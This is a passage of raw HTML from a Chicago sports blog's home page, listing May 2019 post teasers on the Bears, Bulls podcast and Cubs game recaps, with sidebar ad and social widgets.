srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="45974" data-permalink="https://theloopsports.com/screen-shot-2019-02-15-at-8-16-43-pm/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=1338%2C826&amp;ssl=1" data-orig-size="1338,826" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=300%2C185&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=950%2C586&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/jacksoble/">Jack Soble</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/10/which-veteran-players-could-be-in-their-last-year-with-the-bears/">May 10, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/10/which-veteran-players-could-be-in-their-last-year-with-the-bears/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/10/which-veteran-players-could-be-in-their-last-year-with-the-bears/" rel="bookmark">Which Veteran Players Could Be in Their Last Year with the Bears?</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>With the 2019 draft out of the way, Bears fans&#8217; attentions have firmly centered on the upcoming regular season, and<a class="more-link" href="https://theloopsports.com/2019/05/10/which-veteran-players-could-be-in-their-last-year-with-the-bears/">Continue Reading</a></p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48490 --> <article id="post-48519" class="cf post-48519 post type-post status-publish format-standard has-post-thumbnail hentry category-bulls category-tlspodcasts tag-chicago-bulls"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/09/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-2-boylen-assistants-mel-smith-lottery-preview-more/"><img width="1024" height="576" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="48172" data-permalink="https://theloopsports.com/2019/04/24/the-loop-on-hoops-bulls-podcast-ep-1-intro-draft-talk-and-much-more/the-loop-on-hoops-logo/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=1926%2C1414&amp;ssl=1" data-orig-size="1926,1414" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="The Loop on Hoops Logo" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=300%2C220&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/04/The-Loop-on-Hoops-Logo-.png?fit=950%2C698&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/nickpetroshag/">Nick Petrusevski</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/09/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-2-boylen-assistants-mel-smith-lottery-preview-more/">May 9, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/09/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-2-boylen-assistants-mel-smith-lottery-preview-more/#comments">1</a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> <a href="https://theloopsports.com/category/podcastsandvideo/tlspodcasts/" rel="category tag">TLS Podcasts</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/09/the-loop-on-hoops-bulls-podcast-%f0%9f%8f%80-ep-2-boylen-assistants-mel-smith-lottery-preview-more/" rel="bookmark">The Loop On Hoops Bulls Podcast 🏀: Ep. 2 – Boylen Assistants, Mel Smith, Lottery Preview &#038; More</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Dan and Nick are here with The Loop On Hoops – A Chicago Bulls podcast putting the fun back in Bulls basketball (suck it Gar/Pax).</p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48519 --> <article id="post-48506" class="cf post-48506 post type-post status-publish format-standard has-post-thumbnail hentry category-cubs category-game-story tag-anthony-rizzo tag-chicago-cubs tag-kris-bryant tag-mike-montgomery tag-mlb tag-yu-darvish"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/09/darvish-struggles-cubs-through/"><img width="1024" height="576" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="Cubs" srcset="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1 1024w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1260%2C709&amp;ssl=1 1260w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="45973" data-permalink="https://theloopsports.com/2019/03/31/cubs-back-forth-rangers/screen-shot-2019-02-15-at-8-34-06-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=1272%2C790&amp;ssl=1" data-orig-size="1272,790" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Cubs" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=300%2C186&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=950%2C590&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/dannyd52/">Daniel Shepard</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/09/darvish-struggles-cubs-through/">May 9, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/09/darvish-struggles-cubs-through/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/cubs/" rel="category tag">Cubs</a> <a href="https://theloopsports.com/category/game-story/" rel="category tag">Game Story</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/09/darvish-struggles-cubs-through/" rel="bookmark">Cubs: Darvish Struggles, Offense Comes Through in 4-1 Win</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Yu Darvish struggled on Thursday, but the Cubs&#8217; offense picked him up in a 4-1 defeat of the Miami Marlins. Daniel Shepard has the details of the victory here.</p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48506 --> <article id="post-48417" class="cf post-48417 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears tag-chicago-bears tag-kerrith-whyte"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/09/how-can-kerrith-whyte-make-the-bears-roster/"><img width="958" height="576" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?resize=958%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="" data-attachment-id="46296" data-permalink="https://theloopsports.com/screen-shot-2019-02-20-at-10-42-41-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?fit=958%2C710&amp;ssl=1" data-orig-size="958,710" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Bears" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?fit=300%2C222&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?fit=950%2C704&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/jarodblankenship/">Jarod</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/09/how-can-kerrith-whyte-make-the-bears-roster/">May 9, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/09/how-can-kerrith-whyte-make-the-bears-roster/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/09/how-can-kerrith-whyte-make-the-bears-roster/" rel="bookmark">How Can Kerrith Whyte Make the Bears&#8217; Roster?</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>The Bears made a splash with their first pick by trading up and selecting running back David Montgomery in the<a class="more-link" href="https://theloopsports.com/2019/05/09/how-can-kerrith-whyte-make-the-bears-roster/">Continue Reading</a></p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48417 --> <article id="post-48492" class="cf post-48492 post type-post status-publish format-standard has-post-thumbnail hentry category-cubs category-game-story tag-addison-russell tag-cubs tag-kyle-hendricks tag-theo-epstein"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/08/cubs-defeat-marlins-russell-returns/"><img width="1024" height="576" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="Cubs" srcset="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1 1024w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1260%2C709&amp;ssl=1 1260w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="45973" data-permalink="https://theloopsports.com/2019/03/31/cubs-back-forth-rangers/screen-shot-2019-02-15-at-8-34-06-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=1272%2C790&amp;ssl=1" data-orig-size="1272,790" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Cubs" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=300%2C186&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=950%2C590&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/ajbloomberg/">Austin Bloomberg</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/08/cubs-defeat-marlins-russell-returns/">May 8, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/08/cubs-defeat-marlins-russell-returns/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/cubs/" rel="category tag">Cubs</a> <a href="https://theloopsports.com/category/game-story/" rel="category tag">Game Story</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/08/cubs-defeat-marlins-russell-returns/" rel="bookmark">Heyward Walks Off in 11th, Hendricks Shines in Cubs 3-2 Victory</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Kyle Hendricks dominated as the Cubs won in extras, but the return of Addison Russell overshadowed the W. Austin Bloomberg details why.</p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48492 --> <article id="post-48455" class="cf post-48455 post type-post status-publish format-standard has-post-thumbnail hentry category-cubs category-game-story tag-albert-almora tag-chicago-cubs tag-jon-lester tag-kris-bryant tag-mlb"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/07/bryant-cubs-marlins/"><img width="1024" height="576" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="Cubs" srcset="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1 1024w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1260%2C709&amp;ssl=1 1260w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="45973" data-permalink="https://theloopsports.com/2019/03/31/cubs-back-forth-rangers/screen-shot-2019-02-15-at-8-34-06-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=1272%2C790&amp;ssl=1" data-orig-size="1272,790" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Cubs" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=300%2C186&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=950%2C590&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/dannyd52/">Daniel Shepard</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/07/bryant-cubs-marlins/">May 7, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/07/bryant-cubs-marlins/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/cubs/" rel="category tag">Cubs</a> <a href="https://theloopsports.com/category/game-story/" rel="category tag">Game Story</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/07/bryant-cubs-marlins/" rel="bookmark">Bryant, Cubs Walk-off Marlins 5-2 on Chilly Night at Wrigley</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Kris Bryant homered in the ninth as the Cubs walked off the Miami Marlins by a score of 5-2 on Tuesday. Daniel Shepard has the details of the victory here.</p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48455 --> <nav class="navigation pagination" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><span aria-current='page' class='page-numbers current'><span class="meta-nav screen-reader-text">Page </span>1</span> <a class='page-numbers' href='https://theloopsports.com/page/2/'><span class="meta-nav screen-reader-text">Page </span>2</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='https://theloopsports.com/page/291/'><span class="meta-nav screen-reader-text">Page </span>291</a> <a class="next page-numbers" href="https://theloopsports.com/page/2/"><span class="meta-nav">Older</span> <span class="screen-reader-text">Older Posts</span> </a></div> </nav> </div><!-- end #primary --> <aside id="secondary" class="sidebar widget-area" role="complementary"> <section id="media_image-14" class="widget widget_media_image"><style>.widget.widget_media_image img { height: auto; max-width: 100%; } </style><a href="https://www.monkeyknifefight.com/newgame/?p_source=loopmkf"><img width="200" height="600" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-3-200x600px-NFL.png?fit=200%2C600&amp;ssl=1" class="image wp-image-44378 attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-3-200x600px-NFL.png?w=200&amp;ssl=1 200w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-3-200x600px-NFL.png?resize=50%2C150&amp;ssl=1 50w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-3-200x600px-NFL.png?resize=100%2C300&amp;ssl=1 100w" sizes="(max-width: 200px) 100vw, 200px" data-attachment-id="44378" data-permalink="https://theloopsports.com/artboard-3-200x600px-nfl/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-3-200x600px-NFL.png?fit=200%2C600&amp;ssl=1" data-orig-size="200,600" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="MKF" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-3-200x600px-NFL.png?fit=100%2C300&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-3-200x600px-NFL.png?fit=200%2C600&amp;ssl=1" /></a></section><section id="twitter_timeline-15" class="widget widget_twitter_timeline"><h2 class="widget-title">Follow me on Twitter</h2><a class="twitter-timeline" data-height="400" data-theme="light" data-link-color="#f96e5b" data-border-color="#e8e8e8" data-lang="EN" data-partner="jetpack" href="https://twitter.com/@TheLoop_Sports" href="https://twitter.com/@TheLoop_Sports">My Tweets</a></section><section id="media_image-15" class="widget widget_media_image"><style>.widget.widget_media_image img { height: auto; max-width: 100%; } </style><a href="https://www.monkeyknifefight.com/newgame/?p_source=loopmkf"><img width="300" height="286" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-4-315x300px-copy-2.png?fit=300%2C286&amp;ssl=1" class="image wp-image-44382 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-4-315x300px-copy-2.png?w=315&amp;ssl=1 315w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-4-315x300px-copy-2.png?resize=150%2C143&amp;ssl=1 150w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-4-315x300px-copy-2.png?resize=300%2C286&amp;ssl=1 300w" sizes="(max-width: 300px) 100vw, 300px" data-attachment-id="44382" data-permalink="https://theloopsports.com/2018/12/22/nfl-draft-prospects-to-watch-saturday-december-22nd/artboard-4-315x300px-copy-2/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-4-315x300px-copy-2.png?fit=315%2C300&amp;ssl=1" data-orig-size="315,300" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="MKF" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-4-315x300px-copy-2.png?fit=300%2C286&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2018/12/Artboard-4-315x300px-copy-2.png?fit=315%2C300&amp;ssl=1" /></a></section></aside><!-- #secondary --> </div><!-- end .blog-wrap --> <section id="front-section-about" class="front-section cf"> <div class="section-about-column-two"> <h3 class="social-front-title">Follow Us</h3> <nav class="jetpack-social-navigation jetpack-social-navigation-genericons" role="navigation" aria-label="Social Links Menu"> <div class="menu-social-media-container"><ul id="menu-social-media-3" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15"><a target="_blank" rel="noopener noreferrer" href="https://www.facebook.com/TheLoopSports"><span class="screen-reader-text">Facebook</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17"><a target="_blank" rel="noopener noreferrer" href="https://twitter.com/TheLoop_Sports"><span class="screen-reader-text">Twitter</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-18"><a href="https://www.instagram.com/theloopsports/"><span class="screen-reader-text">Instagram</span></a></li> </ul></div> </nav><!-- .jetpack-social-navigation --> </div><!-- end #social-front --> </section><!-- end #front-section-about --> <section id="front-section-three" class="front-section cf"> <h3 class="front-section-title">Typical Chicago Fan - A Casual Fan&#039;s Take on the Chicago Sports Landscape<span><a class="all-posts-link" href="https://theloopsports.com/category/typical-chicago-fan/">See all posts</a></span></h3> <div class="section-three-column-one"> <article id="post-46670" class="post-46670 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-major-league-baseball category-podcastsandvideo category-the-word-on-35th-street category-typical-chicago-fan tag-dane-dunning tag-nick-madrigal tag-podcast tag-rick-hahn tag-white-sox tag-word-on-35th-street"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2019/03/02/the-word-on-35th-street-%f0%9f%94%8a-white-sox-forced-to-make-moves/"><img width="1260" height="709" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/09/Word-on-35th-Street.jpeg?resize=1260%2C709&amp;ssl=1" class="attachment-nikau-front-big size-nikau-front-big wp-post-image" alt="" srcset="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/09/Word-on-35th-Street.jpeg?resize=1024%2C576&amp;ssl=1 1024w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/09/Word-on-35th-Street.jpeg?resize=1260%2C709&amp;ssl=1 1260w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/09/Word-on-35th-Street.jpeg?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 1260px) 100vw, 1260px" data-attachment-id="41985" data-permalink="https://theloopsports.com/2018/09/27/the-word-on-35th-street-michael-kopechs-injury-white-sox-records-and-end-of-the-season-thoughts/word-on-35th-street/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/09/Word-on-35th-Street.jpeg?fit=2000%2C2000&amp;ssl=1" data-orig-size="2000,2000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="The Word on 35th Street" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/09/Word-on-35th-Street.jpeg?fit=300%2C300&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2018/09/Word-on-35th-Street.jpeg?fit=950%2C950&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a 